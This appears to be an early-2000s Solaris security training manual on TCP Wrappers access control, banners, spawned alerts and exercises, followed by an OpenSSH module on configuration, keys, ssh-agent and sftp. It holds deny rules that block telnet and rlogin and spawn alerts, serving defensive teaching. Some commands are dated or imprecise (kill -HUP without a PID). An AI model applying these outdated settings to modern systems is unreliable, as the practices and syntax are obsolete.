Each access file consists of one or more lines with the followingcolon-separated fields:

service : client : options

where:

● service – The name of the service to allowed or block, or the valueALL for all services. Specify multiple services in a comma-separatedlist.

● client – The host name, IP address, network address or domainname of the clients to allow or block. Specify multiple clients in acomma-separated list or use the keyword ALL for all clients.

● A client name beginning with a dot (. ) is assumed to be apartial domain name (for example .sun.com ) and refers to allhosts in that domain or subdomain.



● A client name ending with a dot is assumed to be a networkaddress (for example 192.168.0.) and refers to all hosts on thatsubnet.

● As a safeguard against client address spoofing, TCP Wrappersvalidate host names and addresses using a DNS server andreject clients if a discrepancy is found.

● options – Allow the definition of banners (see “Using Banners WithTCP Wrappers” on page 15-19) and the spawning of commands (see“Using TCP Wrappers to Spawn Commands” on page 15-25).

Code 15-2 sets a default to explicitly deny all hosts access to all services.

Code 15-2 Example hosts.deny File Entry

# more /etc/hosts.denyALL: ALL

Your hosts.deny file should always contain the entry in Code 15-2 as thevery last line.

Code 15-3 shows an allow file example.

Code 15-3 Example hosts.allow File Entry

# more /etc/hosts.allowin.ftpd: 192.168.1., 192.168.2.in.telnetd, in.rlogind: wallace, grommit, sean

Code 15-3 allows all hosts on subnets 192.168.1 and 192.168.2 to use FTPand hosts wallace , grommit , and sean to use the telnet and rlogincommands.

The following is a sample of log file entry where a client system wasdenied access:

May 25 11:09:45 wallace in.telnetd[915]: [ID 947420 mail.warning] refusedconnect from 192.168.99.1

Using Banners With TCP Wrappers



Banners allow you to display notification messages to clients before theylog in to a system or when they are denied service. You can configurebanner messages as options for any entry in the hosts.allow andhosts.deny files.

The banner option format is:

:banners message_directory

where the message_directory is a directory containing one file for eachtype of service for which banner is specified. Each file name has the samename as the service with which it is used. Code 15-4 shows an examplebanner configuration.

Code 15-4 Banner Configuration

# more /etc/hosts.denyALL: ALL: banners /etc/tcpd.deny



# ls /etc/tcpd.denyin.ftpd in.telnetd# more /etc/tcpd.deny/in.ftpd220 Sorry but you are not authorized to use this FTP service.

An unauthorized client trying to use FTP or telnet services receives thebanner message, while authorized clients receive the FTP or telnetservice. Clients denied access to other services do not see any output andtheir connection is refused.



Building Banner Files

Some network services such as FTP require that the banner messages bein a special format (FTP messages must start with 220). To simplify thecreation of banner messages, the TCP Wrappers package includes aBanners.makefile which creates suitable service–specific banners from atemplate message file called prototype .

The Banners.makefile command is included in the TCP Wrappersinstallation directory. If the SVR4 package from the Sun Freeware site isused, this file is installed in the /usr/local/doc/tcp_wrappersdirectory. Copy the make file to the banners message directory, rename itMakefile, create the prototype message file, and run the make commandas shown in Code 15-5.

Code 15-5 Building Banner Files

# mkdir /etc/tcpd.deny# cd /etc/tcpd.deny# cp /usr/local/doc/tcp_wrappers/Banners.Makefile makefile# cat >prototypeService unavailable# make



Customizing a Banner Message

You can customize the text in the banner message files using the followingsubstitution codes:

● %a– Client’s IP address (for example 192.168.1.1)

● %c– Client’s canonical host name (for example wallace.sun.com )

● %d– Server’s daemon (for example in.ftpd )

● %h– Client’s host name (for example wallace )

● %n– Client’s name (for example wallace )

● %p– Process ID (for example 2134)

● %s– Server daemon and host name (for example in.ftpd@grommit )

● %u– Client user (for example alice )

● %A– Server’s IP address (for example 192.102.1.93 )

● %H– Server’s host name (for example grommit )

● %N– Server name (for example grommit )

● %%– A percent sign



Code 15-6 shows an example of the text file using substitution codes.

Code 15-6 Using Banner Substitution Codes

# cat /etc/tcpd.deny/in.telnetd

Warning! You have attempted to connect to a secure systemfrom %a, also known as %h (username %u). Your attempt has been logged.

The file in Code 15-6 expands to produce the output shown in Code 15-7.

Code 15-7 Banner File Output

# telnet wallaceTrying 192.168.1.1...Connected to wallace.Escape character is " ]".Warning! You have attempted to connect to a secure systemfrom penguin, also known as penguin (username unknown). Your attempt hasbeen logged.

Using Banners Without TCP Wrappers


Using Banners Without TCP Wrappers

You do not have to use TCP Wrappers just for producing banners. Mostinteractive network services allow a BANNERoption in their defaultconfiguration files, as follows:

● Banner for FTP:

# more /etc/default/ftpdBANNER="This is a secure host!"

● Banner for telnet :

# more /etc/default/telnetdBANNER="\nWARNING!\nUnauthorized access will be prosecuted!\n"

● Banner for telnet , rlogin , and other logins:

# more /etc/issueThis host is monitored at all times. Violations may result indisciplinary action.

Using TCP Wrappers to Spawn Commands



You can run commands and scripts in the same way as banners. Usecommands to send a page or email a message when a client connects orattempts to connect.

The spawn option format is:

:spawn command

where commandis any UNIX command, including pipelines and I/Oredirection. Execute the command line with the Bourne shell (/bin/sh ),and you can use the same percent letter substitution as the banner option(see “Customizing a Banner Message” on page 15-22).

Note – The default path for the tcpd daemon isPATH=/usr/bin:/usr/sbin . Use absolute path names for commands notin these directories.



If the system has a command called pager in the /usr/local/bindirectory which reads a message from standard input and sends themessage to the pager number on the command line, you could set up ageneral intruder alert, as shown in Code 15-8.

Code 15-8 Setting Up an Intruder Alert

# cat /etc/hosts.denyALL :ALL :spawn echo "intruder %h(%a) detected at date`" |/usr/local/bin/pager 123 876 5432

If you need both banner and spawn options, include them in any order onthe line in the hosts.* file. For example, if you want to track onlinewhether a particular client used the telnet command, add a line like thefollowing to the hosts.allow file:

in.telnetd: penguin: banners /etc/tcpd.allow: spawn echo "%h hasconnected" | write root

Checking Host Access Configuration



The tcpdmatch command performs configuration checks by checking theaccess control files and demonstrating the behavior. Use this command toperform error checking before you deploy the TCP Wrappers.

The syntax for the tcpdmatch command is:

tcpdmatch service host

where:

● service is the service name such as in.telnetd

● host is the client host name or IP address



Code 15-9 shows an example.

Code 15-9 Using the tcpdmatch Command

# tcpdmatch in.telnetd grommitclient: address 192.168.1.2server: process in.telnetdaccess: allowed

Exercise: Authenticating Network Services




● Install TCP Wrappers

● Enable logging for telnet connections

● Configure TCP Wrappers to deny telnet access to specific hosts

● Configure TCP Wrappers to warn of denied telnet access

● Configure TCP Wrappers to deny access to all hosts except thosespecified

Preparation

There is no specific preparation needed for these exercises.

Tasks

You are not required to finish all of the tasks in the time allocated by theinstructor. However, ensure that you remove all host access control files asdescribed in “Removing Host Access Control” on page 15-36 to ensurethat host access control does not affect future module exercises.

Task – Installing TCP Wrappers

In this task, you install the TCP Wrappers executable tcpd program:

1. Download the TCP Wrappers package from the Sun Freeware Website. A copy has already been downloaded and saved in the/usr/local/pkg directory.

2. Install this SVR4 package using the pkgadd command.



Task – Enabling Logging for telnet Connections

In this task, you configure TCP Wrappers to log network connections fortelnet :

1. Configure your telnet service to use visible TCP Wrappers (modifythe /etc/inetd.conf file). TCP Wrappers do not supportTCP/IPv6, so you must change the service type from tcp6 to tcp .

2. Enable logging for this service to the Syslog command.

Task – Denying Access to Specific Hosts

In this task, you configure the host access control feature of Solaris OE sothat TCP Wrappers can deny telnet access to specific hosts:

1. Modify your TCP Wrappers configuration so that your workstationis denied access to its own telnet service.

2. Send a banner to the telnet client indicating that access is denied.

3. Check your configuration using the tcpdmatch command.

Task – Configuring TCP Wrappers to Warn of Deniedtelnet Access

Enhance your TCP Wrappers configuration to use the write command tosend a message to the root user whenever an attempt to use the telnetcommand is denied (include the client IP address and host name in themessage).

Task – Configuring TCP Wrappers to Deny Access toAll Hosts Except Those Specified

In this task, you create a secure host access control configuration whichdenies access to all hosts except those explicitly specified in theconfiguration files:

1. Configure your system so that all systems other than yourworkstation and the instructor’s workstation are denied access to thetelnet service.

2. Remove all access controls for network services on your system.



Task – Removing Host Access Control

In this task, remove your host access files to prevent host access controlfrom interfering with future module exercises.

Exercise Summary


Exercise Summary

?!


● Experiences

● Interpretations

● Conclusions

● Applications

Exercise Solutions


Exercise Solutions


Installing TCP Wrappers

1. Download the TCP Wrappers package from the Sun Freeware Website. A copy has already been downloaded and saved in the/usr/local/pkg directory.

2. Install this SVR4 package using the pkgadd command.

# cd /usr/local/pkg# pkgadd -d tcp_wrappers-7.6-sol8-sparc-local

Enabling Logging for telnet Connections

1. Configure your telnet service to use visible TCP Wrappers (modifythe /etc/inetd.conf file). TCP Wrappers do not support TCP/IPv6so you must change the service type from tcp6 to tcp :

a. Edit the /etc/inetd.conf file and comment out the telnetline:

#telnet stream tcp6 nowait root /usr/sbin/in.telnetd in.telnetd

b. Type a new telnet entry which uses the tcpd program in the/usr/local/sbin directory and does not include support forTCP/IPv6:

telnet stream tcp nowait root /usr/local/sbin/tcpd in.telnetd

c. Identify the PID for the inetd command and send the hang-upsignal to get it to read the configuration file again:

# ps -ef | grep inetd...# kill -HUP inetd

2. Enable logging for this service to the Syslog utility:

a. Update the /etc/syslog.conf file so that it logs all mailmessages to the sc300log file.

Exercise Solutions


# vi /etc/syslog.confmail.info /var/adm/sc300log

b. Send the hang up signal to the syslogd command to get it toread the new configuration:

# ps -ef | grep syslogd...# kill -HUP syslogd

c. Test your changes by running the telnet command from ashell window to connect back to your system:

# telnet localhost

Denying Access to Specific Hosts

1. Modify your TCP Wrappers configuration so that your workstationis denied access to its own telnet service:

a. Identify your host name using:

# hostname

b. Create the /etc/hosts.deny file and add the following line tothis file to block your own workstation:

in.telnetd: hostname

c. Check the configuration with:

# tcpdmatch in.telnetd wallaceclient: hostname wallceclient: address 192.168.1.1server: process in.telnetdaccess: denied

d. Test your changes by running the telnet command from ashell window to connect back to your system. You shouldreceive your banner message rather than a telnet session:

# telnet localhost

2. Send a banner to the telnet client indicating that access is denied:

a. Edit the /etc/hosts.deny file and change the entry for yourworkstation to:

Exercise Solutions


in.telnetd: hostname : banners /etc/tcpd.deny

b. Create a new directory called /etc/tcpd.deny :

# mkdir /etc/tcpd.deny

c. Create a banner file for the telnet service and enter a suitable“service denied” message:

# cat >/etc/tcpd.deny/in.telnetdGo away %h you are not allowed access to this service^D

d. Test your changes by running the telnet command from ashell window to connect back to your system. You shouldreceive your banner message rather than a telnet session:

# telnet localhostGo away wallace you are not allowed access to this service

3. Check your configuration with the tcpdmatch command:

# tcpdmatch in.telnetd localhostclient: address 192.168.0.1server: process in.telnetdaccess: denied

Configuring TCP Wrappers to Warn of Denied telnetAccess

Enhance your TCP Wrappers configuration to use the write command tosend a message to the root user whenever an attempt to use the telnetcommand is denied (include the client’s IP address and host name in themessage).

Update the entry for your workstation in the /etc/hosts.deny file:

in.telnetd: hostname : banners /etc/tcpd.deny: spawn echo "telnet intruder%c(%h)" | write root

Test your changes by running telnet from a shell window to connectback to your system. You should receive your banner message back asbefore, and all your shell windows should show a write message:

# telnet localhost...Message from root on wallace (pts/6) [ Fri May 25 12:57:28 ] ...

Exercise Solutions


telnet intruder wallace(192.168.0.250)<EOT>

Configuring TCP Wrappers to Deny Access to AllHosts Except Those Specified

1. Configure your system so that all systems other your workstationand the instructor’s workstation are denied access to the telnetservice:

a. Create a file called /etc/hosts.allow with the followingentries (assuming the instructor’s system is called grommit andyour system is wallace ):

in.telnetd: wallace, grommit

b. Update the single line in the /etc/hosts.deny file to deny allhosts (remove the spawn option to avoid unwanted writecommands being issued):

in.telnetd: ALL: banners /etc/tcpd.deny

2. Remove all access controls for network services on your system byeither:

Removing the /etc/hosts.deny and /etc/hosts.allow files:

# rm /etc/hosts.deny /etc/hosts.allow

Or restoring the original telnet entry in the /etc/inetd.conf file:

telnet stream tcp6 nowait root /usr/sbin/in.telnetd in.telnetd

Removing Host Access Control

Remove your host access files to prevent host access control frominterfering with future module exercises:

# rm /etc/hosts.allow /etc/hosts.deny


Module 16

Securing Remote Access

Objectives


● Identify the benefits of the secure shell

● Install and configure the secure shell

● Use the secure shell

Relevance


Relevance

?!

Discussion – The following questions are relevant to securing remoteaccess:

● Do you regularly use the Berkeley r commands (such as rsh ,rlogin , and rcp ) or telnet for remote access?

● How can you make these commands easier or more convenient touse?

● What are the security implications of these strategies?

● What methods are available to make such tools secure?


Securing Remote Access 16-3Copyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C



● OpenSSH, [http://www.openssh.com/ ]

● Online man page for the OpenSSH utilities ssh(1) , ssh-add(1) ,ssh-agent(1) , ssh-keygen(1) , and sshd(8) , scp(1)

● Solaris OE Freeware, [http://www.sunfreeware.com/ ]

● Gregory, Pete H., Solaris Security. Prentice Hall, 2000.

● Barrett, Daniel J. and Silverman, Richard E., SSH: The Secure Shell,The Definitive Guide (the Snail Book), O’Reilly and Associates, 2000.

● Barrett, Daniel J. and Silverman, Web site for the Snail Book,[http://www.snailbook.com ]

Identifying the Benefits of the Secure Shell



The secure shell (OpenSSH) is one utility in a set of utilities in theOpenSSH suite of tools. This suite of tools replaces remote accessprograms such as telnet and the Berkeley r commands (rlogin , rsh ,rcp ). The OpenSSH tools provide improved security and functionalitycompared with the other suites of tools, and require little learning forusers familiar with the old commands. The latest version of OpenSSH alsocontains a secure replacement for FTP.

The OpenSSH design philosophy is:

● Never trust the network (even a component of it, such as a DNSserver).

● Place a minimum of trust in the remote server.

To obtain a high level of security, OpenSSH uses encryption andauthentication algorithms, and in particular uses a cryptography knownas public key encryption. These functions have resulted in a very secure setof tools.



The SSH protocol is almost Internet standard (it does not have an RFCnumber allocated yet), and many SSH clients are available for a widerange of operating systems. A user without root access can install SSH(with reduced functionality). You can set SSH to revert to the Berkeley rcommands if SSH is not available on the remote server.

SSH is often supported as a secure transport mechanism. For example,utilities such as CVSand rsync can use SSH for the secure transfer of files.

The original SSH program was written by Tatu Ylonen of Finland in 1995and released as freeware, although it is now being marketedcommercially. OpenSSH is a derivative of an early version of SSH.OpenSSH is being developed independently and is available for free onthe Web.



OpenSSH Tools

The OpenSSH suite of tools consists of the following programs:

● ssh(1) – The client program used to log into another machine or toexecute commands on the other machine. (slogin is often used as analias for ssh .)

● scp(1) – Securely copies files from one machine to another. scp(1)can copy recursively, and it can copy files between two remotemachines.

● ssh-keygen(1) – Creates authentication keys for server and clientauthentication.

● ssh-agent(1) – An authentication agent that holds keys on behalfof the user. ssh-agent(1) eliminates the need to constantly enterpassphrases to unlock keys.

● ssh-add(1) – Registers new keys with the authentication agent.

● ssh-keyscan(1) – Obtains public keys from servers.

● sftp(1) – A secure version of FTP



● sshd(8) – The server program that runs on the server machine. Itlistens for connections from clients (ssh or scp ). When it receives aconnection, sshd(8) performs authentication and begins serving theclient.

● sftp-server(8) – The server program that processes requests fromsftp .



Using Encryption and Compression

OpenSSH is more secure than the Berkeley r commands because the toolsare immune to network monitoring. All authentication information andsession data is encrypted. Session data can be just as valuable as theauthentication information, because it might contain passphrases, creditcard or bank details, and other sensitive information.

To encrypt the communication session, the client and server generate andexchange a session key using the RSA (Rivest Shamir Adleman—theprofessors who created the algorithm) public key algorithm. After thesession key is exchanged, all traffic between the client and server isencrypted and safe from anyone monitoring the network.

OpenSSH also performs compression. Compression can improveperformance, for example in situations when you are copying large filesover slow connections.



Security Benefits of Server Authentication

OpenSSH prevents spoofing or “man-in-the-middle” attacks. This class ofattacks involves fooling a client into accessing another server instead ofthe one the client wants. Spoofing can be done with a compromised routeror a DNS server.

When the client connects to the untrusted server, it reveals theauthentication information, and the untrusted server uses thisinformation to connect to the true server as the client. The untrustedserver passes information between the client and the true server and thenobtains authentication information and session data.

To prevent this class of attack, OpenSSH uses the RSA public keyalgorithm for authenticating servers. The server generates a public andprivate RSA key pair (RSA keys always come in pairs). The public key isdistributed to clients and authenticates the server (because only the serverhas the private key that creates the authentication certificates).



The first time an OpenSSH program connects to a server, it records theserver’s public key in a file. If the client connects to the same server laterand the public key has changed, the client knows a spoofing attack mightbe happening. The client is warned and is asked whether it wants toproceed (the server might have been upgraded and generated a new key).

The current server authentication scheme means there can be a spoofingattack on the very first connection to a server. One solution to thisproblem might be to use certificates in the same way as the Secure SocketLayers (SSL) security protocol.

Certificates make the software and administration procedure morecomplicated because certificates must be certified by a certificationauthority and checked against revocation lists. Certificates are better usedas a digital identity, where you do not know the second party.

With remote access, however, you usually know the other party, so youcan avoid the use of certificates and check the key fingerprint on the firstconnection. Another option is to manually record the correct server key inthe known_hosts file. The ssh-keyscan program can create known_hostsfiles.



Client Authentication

OpenSSH uses RSA encryption keys for authentication. Like serverauthentication keys, RSA encryption keys consist of public and privatecomponents. Authentication uses a challenge-response algorithm, wherethe server generates a challenge and the client must provide the correctresponse. The client uses the key’s private component to generate thecorrect response, and the server verifies it using the key’s publiccomponent. You must register the public component of the client key withthe server for your client to be granted remote access. Because the servernever accesses the client’s private key, an intruder on a compromisedserver cannot obtain the client’s keys.

On a standard, passphrase-based system an intruder could collectpassphrases from clients as they connected. This is why you should notuse the same passphrase for multiple servers. However, with OpenSSHclient keys, you do not have a security problem using a single key for allaccounts.



The client’s public and private key pair are stored in the user directory. Toprevent the theft of a user’s key (perhaps when a machine is leftunattended), the private key is usually encrypted with a passphrase.When you use the OpenSSH tools with RSA authentication, thepassphrases are only used to encrypt the private key, and the passphrasesare not directly used for authentication.

Forwarding TCP/IP Ports Using OpenSSH

Port forwarding is an OpenSSH process where the ssh program:

● Connects to a remote server

● Listens on various ports on this server

● Forwards all traffic to and from ports on the client machine

For instance, X clients (such as xterm ) typically communicate with the Xserver using port 6000. By configuring the ssh program to listen on port6000 when logged into the remote machine and forwarding traffic to andfrom port 6000 on the local machine (where the X server is running), itappears that there is an X server running locally on the remote machinethat X clients can use. Figure 16-1 demonstrates X11 port forwarding.

Figure 16-1 X11 Port Forwarding



Without port forwarding, the X11 session must be transmittedunencrypted, as shown in Figure 16-2.

Figure 16-2 X11 Session Without Port Forwarding

Using the ssh port fowarding program means that X clients can use theSSH–encrypted communication channel instead of making a direct (andpotentially insecure) connection to the client.

X11 is not the only application that makes use of port forwarding, but it isthe most common one. Because X11 is so common, the ssh programforwards the appropriate X11 ports by default, and sets the DISPLAYenvironment variable for use by the X11 programs on the server.



Copying Files and Executing Commands

The ssh program does not just provide a login shell on a remote machine.You can use the ssh program to execute commands remotely (similarly torsh , except that with the ssh program you have the security benefitsdescribed previously in “Identifying the Benefits of the Secure Shell” onpage 16-4). Executing commands remotely is useful when you buildscripts, especially when you use the ssh program’s automaticauthentication features.

The scp program is the OpenSSH replacement for rcp . The securitybenefits described previously in “Identifying the Benefits of the SecureShell” on page 16-4 apply. As with the ssh program, the automaticauthentication features can make scp particularly valuable when youwrite scripts.

In addition to the scp program, the OpenSSH tools include a secureversion of FTP. The secure FTP allows you to transfer files in a secure andinteractive manner.



Benefits of the Password Agent

OpenSSH includes the ssh-agent program. This is the password agentthat reduces the need to constantly enter passphrases required forauthentication keys. Run the ssh-agent program once at the beginning ofa session, and the OpenSSH utilities obtain passphrases from thepassphrase agent instead of interactively prompting the user. Use thessh-add program to register the keys with the ssh-agent program, andfrom then on the OpenSSH utilities automatically obtain the keys from theagent.

An environment variable holds the process identifier of the ssh-agentprogram. The OpenSSH client uses this environment variable todetermine which ssh-agent program to communicate with. You can usethis information to create long lasting ssh-agent programs, and to usessh-agent programs with scripts.

Configuring the OpenSSH Server



The server configuration is stored in the /etc/sshd_config file. Thedefault version of the sshd_config file is shown in Code 16-1.

Code 16-1 Default sshd_config File

1 # This is ssh server systemwide configuration file.23 Port 224 #Protocol 2,15 #ListenAddress 0.0.0.06 #ListenAddress ::7 HostKey /etc/ssh_host_key8 ServerKeyBits 7689 LoginGraceTime 60010 KeyRegenerationInterval 360011 PermitRootLogin yes12 #13 # Don't read ~/.rhosts and ~/.shosts files14 IgnoreRhosts yes



15 # Uncomment if you don't trust ~/.ssh/known_hosts forRhostsRSAAuthentication16 #IgnoreUserKnownHosts yes17 StrictModes yes18 X11Forwarding no19 X11DisplayOffset 1020 PrintMotd yes21 KeepAlive yes2223 # Logging24 SyslogFacility AUTH25 LogLevel INFO26 #obsoletes QuietMode and FascistLogging2728 RhostsAuthentication no29 #30 # This requires host keys in /etc/ssh_known_hosts31 RhostsRSAAuthentication no32 #33 RSAAuthentication yes3435 # To disable tunneled clear text passphrases, change to no here!36 PasswordAuthentication yes37 PermitEmptyPasswords no38 # Uncomment to disable s/key passwords39 #SkeyAuthentication no4041 # To change Kerberos options42 #KerberosAuthentication no43 #KerberosOrLocalPasswd yes44 #AFSTokenPassing no45 #KerberosTicketCleanup no4647 # Kerberos TGT Passing does only work with the AFS kaserver48 #KerberosTgtPassing yes4950 #CheckMail yes51 #UseLogin no5253 #Subsystemsftp /usr/local/sbin/sftpd54 #MaxStartups 10:30:60



You might want to modify the file to:

● Disable or enable certain forms of authentication (for example, youmight enable .rhosts authentication by modifying lines 14 and 28).

● Use a non-standard port (sshd listens on port 22, shown on Line 3).

● Disable or enable X11 port forwarding (Line 18).

● Setting the Syslog parameters (Line 24–25).

● Change the file location where the authentication keys are stored(Line 7).

● Accept or deny root logins (Line 11). It is a good idea to deny rootlogins and use the su command for administration instead.

The server configuration applies to this particular host. You cannot definedifferent settings based upon which users connect or where they connectfrom. You can run two separate servers, each with its own configurationfile, on different ports.



Creating the Host Key

Before you can start the sshd server daemon, you must have the/etc/sshd_config file and a host key for the server. To create the key,use the ssh-keygen command.

Creating the host key is slightly different from creating the key for anindividual user. When you create the key required to start the sshddaemon, you do not use a password. The key is placed in the/etc/ssh_host_key file (using the -f argument), as shown in Code 16-2.

Code 16-2 Creating the Host Key

# ssh-keygen -f /etc/ssh_host_keyGenerating RSA keys: Key generation complete.Enter passphrase (empty for no passphrase): <enter>Enter same passphrase again: <enter>Your identification has been saved in /etc/ssh_host_key.Your public key has been saved in /etc/ssh_host_key.pub.The key fingerprint is:bf:b3:a6:8e:2d:b1:86:63:64:44:b4:6f:52:cc:7e:42 root@grommit



Note – If you install OpenSSHfrom a source distribution instead of abinary distribution, the make install script generates and installs theserver keys automatically. Code 16-2 on page 16-19 is the manual methodof generating keys using the ssh-keygen command from a binaryinstallation.



Starting the Secure Shell Daemon

Start the sshd server daemon by executing the sshd command:

# /usr/local/bin/sshd

The sshd command is usually placed in the /etc/rc2.d startup scriptsand the server executes as a daemon in the background. You can executethe sshd server from inetd , but this has performance implicationsbecause the server needs to create session keys using the RSA algorithm.Creating session keys can be time consuming and might cause serverdelays. When the server runs as a daemon, the server calculates thesession keys beforehand, so incoming connections are processed instantly.

You can run the server in debug mode by using the -d flag, which is usefulfor testing and debugging. When you run the server in debug mode:

● The server does not run in the background as a daemon

● All debugging and log information is displayed on the standardoutput, not in the log files

● The server exits after processing one connection



Installing the Secure FTP Server

The secure FTP server (sftp-server ) requires no special installation orconfiguration. The sshd program starts sftp-server automaticallywhenever secure FTP requests are made to the server.

Using OpenSSH Clients



You can use the ssh program to obtain a shell on a remote machine, aswith the rsh program, where the argument you provide is the remotemachine name, as shown in Code 16-3.

Code 16-3 Running the ssh Program to Obtain a Remote Shell

$ ssh grommitalice@grommit's password: <enter password>

In Code 16-3, the user is prompted for a passphrase on the remotemachine. This is because the program uses standard passphrase-basedauthentication. When you add other types of authentication, this methodchanges.



In addition to starting a remote shell, you can run a command byproviding a command as the second argument, as shown in Code 16-4 onpage 16-24.

Code 16-4 Running a Command Using the ssh Program

$ ssh grommit walice@grommit's password: <enter password> 8:51PM up 38 days, 5:25, 4 users, load averages: 0.10, 0.17, 0.15USER TTY FROM LOGIN@ IDLE WHATgary p0 pm00 6:16PM 2:00 -su (zsh)gary p1 node1005b.a2000. 05May01 20:07 -su (zsh)gary p2 pm00 6:51PM - sshd:gary p3 pm00 8:06PM - ./ssh/ssh 195.6

Use the scp program to copy files between machines, as shown inCode 16-5.

Code 16-5 Using the scp Program to Copy Files

$ scp grommit:/etc/motd /tmp/motdalice@grommit's password: <enter password>/etc/motd 100%|********************************************************************|344 00:00

Note – Some later versions of the OpenSSH utilities display the remoteenvironment variables on the error output. This does not usually causeproblems, but if you want to keep the remote environment variables frombeing displayed, add 2>/dev/null to the example commands.



Determining Known Hosts

The first time you access a host with any of the OpenSSH clients, you seea message like that shown in Code 16-6.

Code 16-6 Determining Known Hosts

The authenticity of host '192.168.0.1' can't be established.RSA key fingerprint is bf:b3:a6:8e:2d:b1:86:63:64:44:b4:6f:52:cc:7e:42.Are you sure you want to continue connecting (yes/no)? yesWarning: Permanently added '192.168.0.1' (RSA) to the list of knownhosts.

This warning informs you that the host is unknown to you (althoughother users may have accessed this host), and asks whether the sessionshould continue. If you decide to continue, the host key of the server isadded to your file of known hosts ($HOME/.ssh/known_hosts ), andsubsequent access to that host continues without prompting. If, however,the host key changes, you get another warning because aman-in-the-middle attack might be occurring.



You can create a system-wide file of known hosts(/etc/ssh_known_hosts ) containing the public keys of remote servers,so that the warning in Code 16-6 on page 16-25 is not displayed. TheOpenSSH client checks for a known host in both the system-wide/etc/ssh_known_hosts file and the user’s known_hosts files.



Generating Client Keys

To create a client key, use the ssh-keygen command. This is the samecommand you use to generate a server key, except that now you shouldenter a passphrase when prompted (with the server key you used a nullpassphrase), as shown in Code 16-7.

Code 16-7 Generating Client Keys

$ ssh-keygenGenerating RSA keys: Key generation complete.Enter file in which to save the key (/home/alice/.ssh/identity): <enter>Enter passphrase (empty for no passphrase): <enter passphrase>Enter same passphrase again: <enter passphrase>Your identification has been saved in /home/alice/.ssh/identity.Your public key has been saved in /home/alice/.ssh/identity.pub.The key fingerprint is:21:35:ae:ce:7e:26:cc:b8:4d:20:b6:d7:75:c1:ea:e5 alice@wallace



It is more important to protect user keys with a passphrase, and not theserver key, because the user keys allow access to other systems. Use theserver key only for host authentication, and a warning is generated byclients if it ever changes.

The generated keys reside in two files called identity andidentity.pub , in the subdirectory.ssh in the user’s home directory. Theprivate key is stored in the identity file, and is in a binary format, whileidentity.pub is text and looks like Code 16-8 (but all on one line).

Code 16-8 The identity.pub File

1024 35151365426291217189815524610281442736753289075746575514644915985081557493927016840417282917150595416208636742328036067599358117854181866462784837395878212144805532410422736696434143284988351805292331858166145450914307704579028223052539878277329051218647189125320683027483064540533807152609154470367552938409123 alice@wallace

Anything following the large number is only a comment and is ignored.



Granting Access to Other Users

With the Berkeley r commands, access to an account is usually grantedusing the .rhosts files. While you can enable this method (it is disabledby default), it is not recommended. Instead, grant access to an accountusing the authorized_keys file. This file resides in the same directory asthe user’s identity.pub file (usually $HOME/.ssh/ ).

Grant a user access to your account by copying the contents of theiridentity.pub file to your authorized_keys file. A typicalauthorized_keys file has several lines similar to the line in Code 16-8 onpage 16-28, with one line for every authentication key that is grantedaccess to the account. The name at the end of every line is only acomment, and is ignored.

Ideally, you should transfer the key in a secure manner, perhaps on afloppy disk or through some other secure channel such as encryptedemail. One alternative is to email or copy the file in an insecure manner,and to verify the key fingerprint over the telephone.



Using OpenSSH With RSA Authentication

When a user grants another user access by adding their public key (theidentity.pub file) to their authorized_keys file, you can access theiraccount without using (or even knowing) their passphrase. For example,to use the ssh program to access user bob’s account on machine grommit ,enter the following:

$ ssh -l bob grommitEnter passphrase for RSA key 'alice@wallace': <enter passphrase>

You are not asked for the passphrase for user bob , but you are asked forthe passphrase to unlock your OpenSSH key. This also applies to the scpcommand.



Using the ssh-agent Program

When you perform remote commands (ssh ) or remote file copies (scp ), orwhen you run these programs from a script, you might want to avoidentering the passphrase for your key. To do this without removing thepassphrase, use the ssh-agent program.



Execute the ssh-agent program with a parameter that is an executablecommand itself, and give it an environment with access to the client keys.Typically this parameter (program) is a shell or an X session. There are noclient keys in the environment until you add them using the ssh-addprogram. You can also use the ssh-add program to view the keys in thessh-agent environment. When keys have been added, you can use thessh and scp commands without prompting for the passphrase.

Code 16-9 uses the ssh-agent program to start a subshell in which theOpenSSH clients are executed.

Code 16-9 Using the ssh-agent Program to Start a Subshell

$ ssh-agent ksh$ ssh-add -lThe agent has no identities.$ ssh-addNeed passphrase for /export/home/alice/.ssh/identityEnter passphrase for alice@wallace: <enter passphrase>Identity added: /export/home/alice/.ssh/identity (alice@wallace)$ ssh-add -l1024 49:4b:13:bb:6f:8e:46:d1:cd:f2:33:5b:04:99:bb:bd alice@wallace



You do not need to enter the passphrase for the ssh command, because itis now supplied by ssh-agent program.

You can use the ssh-agent program without an argument. In this case,the ssh-agent program runs in the background, answering requests fromOpenSSH clients. You must set the SSH_AGENT_PIDenvironment variablefor the OpenSSH clients to locate the agent and communicate with it. Theeasiest way to use OpenSSH in this mode is to evaluate the ssh-agentcommand as shown in Code 16-10.

Code 16-10 Running the ssh-agent Program in the Background

$ eval ssh-agent$ ssh-add -lThe agent has no identities.$ ssh-addNeed passphrase for /export/home/alice/.ssh/identityEnter passphrase for alice@wallace: <enter passphrase>Identity added: /export/home/alice/.ssh/identity (alice@wallace)$ ssh-add -l1024 49:4b:13:bb:6f:8e:46:d1:cd:f2:33:5b:04:99:bb:bd alice@wallace

You can also use the ssh-agent program by providing a command as anargument, in which case the environment variable is automatically set.The ssh-agent exits when the command exits.

Using the Secure FTP Client

The sftp program is an interactive file transfer program, similar to theftp(1) command. The sftp program performs all operations over anencryption connection the same way as other OpenSSH clients. The sftpprogram uses many of the OpenSSH clients’ features, such as public keyauthentication and compression. The sftp program connects and logsinto the specified host, and then usually enters an interface commandmode. Use the sftp program instead of the scp program to allowinteractive browsing of files and directories.

To start the sftp program, use the remote server name as an argument:

% sftp grommit



You can also use the sftp program by providing the name of a file to beretrieved as an argument (like scp ):

% sftp grommit:/etc/motd

When you specify the file name, the file retrieval happens automatically,when the interactive user authentication has taken place. If theauthentication method requires a passphrase, the user is prompted, andthe transfer automatically happens.



Configuring the Client

The client configuration is stored in the /etc/ssh_config file. Thestandard file contains only comments (as shown in Code 16-11), becausethe defaults are usually adequate.

Code 16-11 The /etc/ssh_config File

1 # This is ssh client systemwide configuration file. This fileprovides2 # defaults for users, and the values can be changed in per-userconfiguration3 # files or on the command line.45 # Configuration data is parsed as follows:6 # 1. command line options7 # 2. user-specific file8 # 3. system-wide file9 # Any configuration value is only changed the first time it is set.10 # Thus, host-specific definitions should be at the beginning of the11 # configuration file, and defaults at the end.12



